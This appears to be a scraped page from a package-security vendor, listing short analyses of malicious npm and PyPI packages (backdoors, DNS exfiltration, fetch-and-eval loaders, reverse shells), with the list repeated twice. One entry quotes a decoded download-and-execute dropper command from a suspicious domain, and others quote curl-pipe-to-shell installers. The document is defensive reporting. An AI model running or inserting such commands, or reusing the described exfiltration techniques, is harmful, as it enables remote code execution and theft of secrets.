Secure your dependencies. Ship with confidence.

The code effectively creates a remote terminal backdoor-like capability via gotty on macOS, with minimal visibility due to silent I/O and hard-coded paths. This is a high-security-risk pattern that warrants removal or strict hardening (authentication, access controls, non-root execution, dynamic path resolution, and explicit port management). A broader code review and deployment safeguards are strongly recommended.

The file implements covert data exfiltration of environment variables via DNS queries to a hard-coded resolver IP (obscured with octal literals). This is malicious behavior (backdoor/data exfiltration). The module should be treated as compromised and not used. Immediate removal and investigation of affected systems and credentials is recommended.

Live on npm for 4 days, 12 hours and 47 minutes before removal. Socket users were protected even while the package was live.

This module is a highly suspicious remote shell component. It exposes a WebSocket-controlled PTY running an interactive login Bash shell, where attacker-controlled network input (msg.cmdline and msg.data) is executed and the resulting terminal output is streamed back to the client. It also weakens TLS verification and performs macOS-specific bash session behavior manipulation. If reachable without strong external authorization controls, it represents a critical compromise risk (backdoor/remote command execution capability).

This file uses the deprecated ‘request’ library to call `https://rest-icon-moduler.vercel[.]app/icons/777` (with a hardcoded header `bearrtoken: logo`), JSON-parses the response and immediately executes the `.credits` property via `eval()`. Worse, it invokes this fetch-and-eval routine at module load time (via `module.exports = { getPlugin: getPlugin() }`), so merely importing the file triggers arbitrary code execution. An attacker controlling the remote endpoint can run any JavaScript in the host process. Immediate remediation: remove all eval-based execution, eliminate network calls at import time, and apply strict validation or sandboxing of any dynamic code.

The code implements an automatic updater that sends detailed local identifiers and environment information to a hardcoded remote service, and crucially it accepts server-supplied scripts and packages which it writes to disk and executes without integrity checks or signing. That behavior allows arbitrary remote code execution and software replacement (including on Android via su/am), and untrusted network responses can directly drive local shell commands and package installations. While the functionality appears intended for legitimate updates, the lack of verification and the use of shell execution and privileged Android commands represent a significant supply-chain and remote-execution risk. Avoid using this module or ensure the updater endpoint and transport are fully trusted and protected; implement code-signing and strict validation before executing remote-provided artifacts.

This code is malicious or part of a malicious toolkit. It includes credential harvesting (Chrome password recovery), remote-hosted binaries download and execution from a hardcoded attacker-controlled server, persistence via autorun, ability to disable system protections (UAC, Task Manager), and privacy-invasive features (webcam capture, clipboard access). Do not run or ship this package; treat it as high-risk malware. Further analysis of downloaded binaries (nircmd.exe, webcam.exe) and any network interactions with the hardcoded server are strongly recommended.

The code is malware that exfiltrates data through DNS queries to a suspicious domain, collects system information without consent, and communicates this data externally.

Live on npm for 22 hours and 10 minutes before removal. Socket users were protected even while the package was live.

This code is largely a legitimate-looking build backend but contains several clear malicious or at-minimum suspicious constructs: an unguarded os.system shell chain that strips and packs the produced binary and moves it to a hardcoded '/sdcard/BLooD' path, an Arabic instruction message telling how to locate a file named NASR.py, use of upx to obfuscate the binary, and possible command injection risk due to unescaped shell interpolation. These actions are consistent with exfiltration and post-build payload staging (copying artifacts to removable storage and obfuscating them). Combined with the anomalous text and the hardcoded target, this indicates intentional malicious behavior in the module. I recommend not using this package and treating artifacts produced by it as suspicious. The file also contains syntax errors at the end, suggesting tampering or truncation; further corroboration with the published package version is needed.

This workflow presents a significant supply-chain risk: it executes code directly from repository documentation without validation or isolation. If an attacker can inject malicious bash blocks into README.md, they can cause arbitrary commands to run in CI, potentially compromising the build environment, leaking secrets, exfiltrating data, or installing malware. It is highly advisable to remove automatic execution of code blocks or implement strict vetting, sandboxing, or safe-guarded execution (e.g., running in a disposable container with restricted permissions and only whitelisted commands). Additionally, restrict PRs from triggering destructive or network-facing actions and consider requiring maintainer approval for code-block execution.

This module is a highly suspicious installer/runner that performs immediate remote code execution using a curl|bash pipeline from a mutable GitHub HEAD URL without integrity verification or pinning. It then executes a local binary while forwarding untrusted CLI arguments through a shell-parsed execSync string, increasing the likelihood of command-parsing/injection issues. Treat this dependency as unsafe in a typical supply-chain context unless the remote installer and resulting binary are fully verified and pinned to immutable, integrity-checked artifacts.

This code exhibits multiple suspicious behaviors including API key mishandling, hardcoded suspicious WebSocket endpoints, and arbitrary network connectivity that could facilitate data theft or backdoor access. The pattern of collecting API keys then clearing them, combined with WebSocket communication to suspicious endpoints, strongly suggests malicious intent.

This module implements remote job fetching and execution primitives with dynamic class loading, web and MQTT interfaces, and multiple default network endpoints (notably hardcoded bsnx.net URLs). It does not appear obfuscated or explicitly destructive, but it provides many powerful remote-control and data-exfiltration capabilities without validation or sandboxing. If untrusted inputs or default endpoints are reachable, an attacker can cause arbitrary code to be imported and executed, files to be written, and internal Python objects to be exposed. Treat as high security risk and audit/lock configuration and network access before use.

The script collects information like the package name, directory, home directory, hostname, username, DNS servers and package JSON data, and sends it to a remote server.

Live on npm for 1 day, 22 hours and 7 minutes before removal. Socket users were protected even while the package was live.

This package is malicious or extremely high risk. The postinstall hook executes a remote script via curl|bash (direct remote code execution). The package also pulls a dependency via a git URL (non-registry source) and uses unpinned dependency specifiers. Do not install this package. Treat any systems that have installed it as compromised until you can audit them.

The code implements a high-risk dynamic evaluation pattern by evaluating tokens within the caller’s scope. This creates a strong possibility of arbitrary code execution and data leakage if tokens originate from untrusted inputs. Hardening should include removing eval, replacing with safe resolvers, sandboxing, or strict token whitelisting and restricting scope access. This pattern is unsuitable for trusted libraries exposes in open-source supply chains without significant safeguards.

This code collects system-identifying data (username, hostname, file path), hex-encodes it, constructs a domain under a hardcoded external base ('furb.pw') embedding that data into subdomain labels, and issues an HTTPS GET to that domain — a clear data-exfiltration pattern. The behavior is malicious or at minimum privacy-invasive telemetry sent to an external third party. The package should not be trusted or used without removal of the network exfiltration logic and a full audit.

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

[Skill Scanner] Pipe-to-shell or eval pattern detected The skill documentation itself describes legitimate RAG pipeline usage and its capabilities align with the stated purpose. I found no code-level malware, hardcoded secrets, or obfuscated backdoors in the provided content. However, there are operational supply-chain and privacy risks: it recommends running a remote installer with 'curl | sh', routes user queries and document contents through inference.sh and third-party app endpoints (potentially exposing sensitive data), and grants broad shell/infsh permissions. These behaviors are coherent with the tool's purpose but increase trust requirements. Recommend reviewing the infsh installer and operator privacy/persistence policies before use, avoid piping unknown install scripts, and ensure sensitive data is redacted before sending to remote extractors/LLMs. LLM verification: The SKILL.md serves as a functional guide for composing RAG pipelines using the inference.sh CLI and hosted third-party apps. The document contains operational security risks rather than code-level malware: notably the use of curl|sh installer pattern and the advice to forward raw extracted content to hosted LLM endpoints without redaction or credential-handling guidance. There is no evidence in the markdown of obfuscated code or embedded backdoors, but the installer pattern and centralized data

The provided code fragment is heavily obfuscated but, in isolation, appears to implement a simple factory that returns a create-operation object when inputs satisfy certain conditions. There is no direct evidence in this snippet of malicious activity such as eval, network exfiltration, secret harvesting, or spawning processes. The obfuscation is concerning and warrants caution: the omitted parts of the module (the a27_0x... functions and other referenced variables) should be inspected to ensure they do not perform hidden network requests, decode and execute code, or read environment/credential data. Overall, the fragment is likely benign but the surrounding obfuscated code should be reviewed.

Live on npm for 5 hours and 57 minutes before removal. Socket users were protected even while the package was live.

The code presents a strong supply-chain and remote-execution risk by automatically downloading and executing remote Python payloads without integrity checks or sandboxing. It also creates and runs external services (Jupyter, Visdom, RStudio) based on user inputs, which can amplify impact if the remote payload is malicious. Mitigations include removing remote code execution paths, adding cryptographic verification (signatures or hash checks), isolating execution (sandboxes or containerization), validating inputs, and avoiding untrusted downloads or executions.

The script contains a high-risk backdoor-like capability: when FMTR_DEV is enabled, it opens root SSH access with a hardcoded password, dumps environment data, and runs SSH in foreground with verbose logging. This undermines container isolation, enables remote compromise, and poses severe supply-chain security risks. It should be removed or replaced with secure, auditable behavior (e.g., disallow root SSH, use proper authentication via keys, avoid dumping environment, and validate inputs).

[Skill Scanner] Pipe-to-shell or eval pattern detected All findings: [CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] This skill documentation is functionally consistent with its claimed purpose (AI podcast creation), but contains high-risk supply-chain and data-flow patterns: it instructs a curl | sh install of a remote CLI, routes user content and generated artifacts through hosted inference.sh endpoints, and chains multiple hosted services which could forward credentials or sensitive content. There is no explicit evidence of obfuscated malware or hardcoded secrets, so it does not appear to contain confirmed malware, but the download-and-execute pattern and centralized remote processing raise moderate-to-high security concerns. Recommend: avoid using the one-line curl|sh installation without manual verification; review infsh privacy/retention and authentication behavior; prefer pinned, auditable installs and understand who controls the hosted endpoints before uploading sensitive content. LLM verification: This skill is plausible and functionally aligned with its stated purpose (AI podcast creation). The main supply-chain/security concern is the recommended pipe-to-shell installer (curl -fsSL https://cli.inference.sh | sh) which downloads and executes remote code; even with published checksums, this pattern is high-risk. Additionally, the workflow routes all user scripts/documents to hosted inference apps (inference.sh/openrouter/etc.), which is expected for a hosted service but increases exposure

This file is a blob of HTML/spam content with embedded links to adult videos, torrent downloads and suspicious redirectors (e.g. https://2023[.]redircdn[.]com/?…, http://rmdown[.]com/link[.]php?hash=…, http://data[.]down2048[.]com/list[.]php?…), plus numerous third-party image URLs. No executable code or proven malware payload is present, but the obfuscated redirects and torrent links pose a high risk of phishing, drive-by downloads or exposure to illicit content. Such anomalous content should be quarantined and removed from any legitimate software dependency.

This source is a network transport implementation for the Sliver C2 implant: it initializes encrypted sessions with a remote C2, polls for commands, and sends responses. It is intentionally designed for covert command-and-control and therefore represents malicious/backdoor behavior in a supply chain context. The code uses insecure math/rand for nonces and request randomization (crypto weakness). There are no hardcoded credentials or obvious obfuscation in this fragment, but templated values can insert configurable headers/paths and proxies at build/runtime. Recommendation: treat this package as malicious in context (implant) and do not include it in trusted software supply chains. If analyzing for defensive purposes, review use of cryptography, replace math/rand where cryptographic randomness is required, and carefully audit how options (proxy creds, host header) are supplied and stored.

The code is a clear implementation of a reverse shell, posing a significant security risk by allowing remote command execution. It is not obfuscated, but its functionality is inherently malicious.

The code effectively creates a remote terminal backdoor-like capability via gotty on macOS, with minimal visibility due to silent I/O and hard-coded paths. This is a high-security-risk pattern that warrants removal or strict hardening (authentication, access controls, non-root execution, dynamic path resolution, and explicit port management). A broader code review and deployment safeguards are strongly recommended.

The file implements covert data exfiltration of environment variables via DNS queries to a hard-coded resolver IP (obscured with octal literals). This is malicious behavior (backdoor/data exfiltration). The module should be treated as compromised and not used. Immediate removal and investigation of affected systems and credentials is recommended.

Live on npm for 4 days, 12 hours and 47 minutes before removal. Socket users were protected even while the package was live.

This module is a highly suspicious remote shell component. It exposes a WebSocket-controlled PTY running an interactive login Bash shell, where attacker-controlled network input (msg.cmdline and msg.data) is executed and the resulting terminal output is streamed back to the client. It also weakens TLS verification and performs macOS-specific bash session behavior manipulation. If reachable without strong external authorization controls, it represents a critical compromise risk (backdoor/remote command execution capability).

This file uses the deprecated ‘request’ library to call `https://rest-icon-moduler.vercel[.]app/icons/777` (with a hardcoded header `bearrtoken: logo`), JSON-parses the response and immediately executes the `.credits` property via `eval()`. Worse, it invokes this fetch-and-eval routine at module load time (via `module.exports = { getPlugin: getPlugin() }`), so merely importing the file triggers arbitrary code execution. An attacker controlling the remote endpoint can run any JavaScript in the host process. Immediate remediation: remove all eval-based execution, eliminate network calls at import time, and apply strict validation or sandboxing of any dynamic code.

The code implements an automatic updater that sends detailed local identifiers and environment information to a hardcoded remote service, and crucially it accepts server-supplied scripts and packages which it writes to disk and executes without integrity checks or signing. That behavior allows arbitrary remote code execution and software replacement (including on Android via su/am), and untrusted network responses can directly drive local shell commands and package installations. While the functionality appears intended for legitimate updates, the lack of verification and the use of shell execution and privileged Android commands represent a significant supply-chain and remote-execution risk. Avoid using this module or ensure the updater endpoint and transport are fully trusted and protected; implement code-signing and strict validation before executing remote-provided artifacts.

This code is malicious or part of a malicious toolkit. It includes credential harvesting (Chrome password recovery), remote-hosted binaries download and execution from a hardcoded attacker-controlled server, persistence via autorun, ability to disable system protections (UAC, Task Manager), and privacy-invasive features (webcam capture, clipboard access). Do not run or ship this package; treat it as high-risk malware. Further analysis of downloaded binaries (nircmd.exe, webcam.exe) and any network interactions with the hardcoded server are strongly recommended.

The code is malware that exfiltrates data through DNS queries to a suspicious domain, collects system information without consent, and communicates this data externally.

Live on npm for 22 hours and 10 minutes before removal. Socket users were protected even while the package was live.

This code is largely a legitimate-looking build backend but contains several clear malicious or at-minimum suspicious constructs: an unguarded os.system shell chain that strips and packs the produced binary and moves it to a hardcoded '/sdcard/BLooD' path, an Arabic instruction message telling how to locate a file named NASR.py, use of upx to obfuscate the binary, and possible command injection risk due to unescaped shell interpolation. These actions are consistent with exfiltration and post-build payload staging (copying artifacts to removable storage and obfuscating them). Combined with the anomalous text and the hardcoded target, this indicates intentional malicious behavior in the module. I recommend not using this package and treating artifacts produced by it as suspicious. The file also contains syntax errors at the end, suggesting tampering or truncation; further corroboration with the published package version is needed.

This workflow presents a significant supply-chain risk: it executes code directly from repository documentation without validation or isolation. If an attacker can inject malicious bash blocks into README.md, they can cause arbitrary commands to run in CI, potentially compromising the build environment, leaking secrets, exfiltrating data, or installing malware. It is highly advisable to remove automatic execution of code blocks or implement strict vetting, sandboxing, or safe-guarded execution (e.g., running in a disposable container with restricted permissions and only whitelisted commands). Additionally, restrict PRs from triggering destructive or network-facing actions and consider requiring maintainer approval for code-block execution.

This module is a highly suspicious installer/runner that performs immediate remote code execution using a curl|bash pipeline from a mutable GitHub HEAD URL without integrity verification or pinning. It then executes a local binary while forwarding untrusted CLI arguments through a shell-parsed execSync string, increasing the likelihood of command-parsing/injection issues. Treat this dependency as unsafe in a typical supply-chain context unless the remote installer and resulting binary are fully verified and pinned to immutable, integrity-checked artifacts.

This code exhibits multiple suspicious behaviors including API key mishandling, hardcoded suspicious WebSocket endpoints, and arbitrary network connectivity that could facilitate data theft or backdoor access. The pattern of collecting API keys then clearing them, combined with WebSocket communication to suspicious endpoints, strongly suggests malicious intent.

This module implements remote job fetching and execution primitives with dynamic class loading, web and MQTT interfaces, and multiple default network endpoints (notably hardcoded bsnx.net URLs). It does not appear obfuscated or explicitly destructive, but it provides many powerful remote-control and data-exfiltration capabilities without validation or sandboxing. If untrusted inputs or default endpoints are reachable, an attacker can cause arbitrary code to be imported and executed, files to be written, and internal Python objects to be exposed. Treat as high security risk and audit/lock configuration and network access before use.

The script collects information like the package name, directory, home directory, hostname, username, DNS servers and package JSON data, and sends it to a remote server.

Live on npm for 1 day, 22 hours and 7 minutes before removal. Socket users were protected even while the package was live.

This package is malicious or extremely high risk. The postinstall hook executes a remote script via curl|bash (direct remote code execution). The package also pulls a dependency via a git URL (non-registry source) and uses unpinned dependency specifiers. Do not install this package. Treat any systems that have installed it as compromised until you can audit them.

The code implements a high-risk dynamic evaluation pattern by evaluating tokens within the caller’s scope. This creates a strong possibility of arbitrary code execution and data leakage if tokens originate from untrusted inputs. Hardening should include removing eval, replacing with safe resolvers, sandboxing, or strict token whitelisting and restricting scope access. This pattern is unsuitable for trusted libraries exposes in open-source supply chains without significant safeguards.

This code collects system-identifying data (username, hostname, file path), hex-encodes it, constructs a domain under a hardcoded external base ('furb.pw') embedding that data into subdomain labels, and issues an HTTPS GET to that domain — a clear data-exfiltration pattern. The behavior is malicious or at minimum privacy-invasive telemetry sent to an external third party. The package should not be trusted or used without removal of the network exfiltration logic and a full audit.

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

[Skill Scanner] Pipe-to-shell or eval pattern detected The skill documentation itself describes legitimate RAG pipeline usage and its capabilities align with the stated purpose. I found no code-level malware, hardcoded secrets, or obfuscated backdoors in the provided content. However, there are operational supply-chain and privacy risks: it recommends running a remote installer with 'curl | sh', routes user queries and document contents through inference.sh and third-party app endpoints (potentially exposing sensitive data), and grants broad shell/infsh permissions. These behaviors are coherent with the tool's purpose but increase trust requirements. Recommend reviewing the infsh installer and operator privacy/persistence policies before use, avoid piping unknown install scripts, and ensure sensitive data is redacted before sending to remote extractors/LLMs. LLM verification: The SKILL.md serves as a functional guide for composing RAG pipelines using the inference.sh CLI and hosted third-party apps. The document contains operational security risks rather than code-level malware: notably the use of curl|sh installer pattern and the advice to forward raw extracted content to hosted LLM endpoints without redaction or credential-handling guidance. There is no evidence in the markdown of obfuscated code or embedded backdoors, but the installer pattern and centralized data

The provided code fragment is heavily obfuscated but, in isolation, appears to implement a simple factory that returns a create-operation object when inputs satisfy certain conditions. There is no direct evidence in this snippet of malicious activity such as eval, network exfiltration, secret harvesting, or spawning processes. The obfuscation is concerning and warrants caution: the omitted parts of the module (the a27_0x... functions and other referenced variables) should be inspected to ensure they do not perform hidden network requests, decode and execute code, or read environment/credential data. Overall, the fragment is likely benign but the surrounding obfuscated code should be reviewed.

Live on npm for 5 hours and 57 minutes before removal. Socket users were protected even while the package was live.

The code presents a strong supply-chain and remote-execution risk by automatically downloading and executing remote Python payloads without integrity checks or sandboxing. It also creates and runs external services (Jupyter, Visdom, RStudio) based on user inputs, which can amplify impact if the remote payload is malicious. Mitigations include removing remote code execution paths, adding cryptographic verification (signatures or hash checks), isolating execution (sandboxes or containerization), validating inputs, and avoiding untrusted downloads or executions.

The script contains a high-risk backdoor-like capability: when FMTR_DEV is enabled, it opens root SSH access with a hardcoded password, dumps environment data, and runs SSH in foreground with verbose logging. This undermines container isolation, enables remote compromise, and poses severe supply-chain security risks. It should be removed or replaced with secure, auditable behavior (e.g., disallow root SSH, use proper authentication via keys, avoid dumping environment, and validate inputs).

[Skill Scanner] Pipe-to-shell or eval pattern detected All findings: [CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] This skill documentation is functionally consistent with its claimed purpose (AI podcast creation), but contains high-risk supply-chain and data-flow patterns: it instructs a curl | sh install of a remote CLI, routes user content and generated artifacts through hosted inference.sh endpoints, and chains multiple hosted services which could forward credentials or sensitive content. There is no explicit evidence of obfuscated malware or hardcoded secrets, so it does not appear to contain confirmed malware, but the download-and-execute pattern and centralized remote processing raise moderate-to-high security concerns. Recommend: avoid using the one-line curl|sh installation without manual verification; review infsh privacy/retention and authentication behavior; prefer pinned, auditable installs and understand who controls the hosted endpoints before uploading sensitive content. LLM verification: This skill is plausible and functionally aligned with its stated purpose (AI podcast creation). The main supply-chain/security concern is the recommended pipe-to-shell installer (curl -fsSL https://cli.inference.sh | sh) which downloads and executes remote code; even with published checksums, this pattern is high-risk. Additionally, the workflow routes all user scripts/documents to hosted inference apps (inference.sh/openrouter/etc.), which is expected for a hosted service but increases exposure

This file is a blob of HTML/spam content with embedded links to adult videos, torrent downloads and suspicious redirectors (e.g. https://2023[.]redircdn[.]com/?…, http://rmdown[.]com/link[.]php?hash=…, http://data[.]down2048[.]com/list[.]php?…), plus numerous third-party image URLs. No executable code or proven malware payload is present, but the obfuscated redirects and torrent links pose a high risk of phishing, drive-by downloads or exposure to illicit content. Such anomalous content should be quarantined and removed from any legitimate software dependency.

This source is a network transport implementation for the Sliver C2 implant: it initializes encrypted sessions with a remote C2, polls for commands, and sends responses. It is intentionally designed for covert command-and-control and therefore represents malicious/backdoor behavior in a supply chain context. The code uses insecure math/rand for nonces and request randomization (crypto weakness). There are no hardcoded credentials or obvious obfuscation in this fragment, but templated values can insert configurable headers/paths and proxies at build/runtime. Recommendation: treat this package as malicious in context (implant) and do not include it in trusted software supply chains. If analyzing for defensive purposes, review use of cryptography, replace math/rand where cryptographic randomness is required, and carefully audit how options (proxy creds, host header) are supplied and stored.

The code is a clear implementation of a reverse shell, posing a significant security risk by allowing remote command execution. It is not obfuscated, but its functionality is inherently malicious.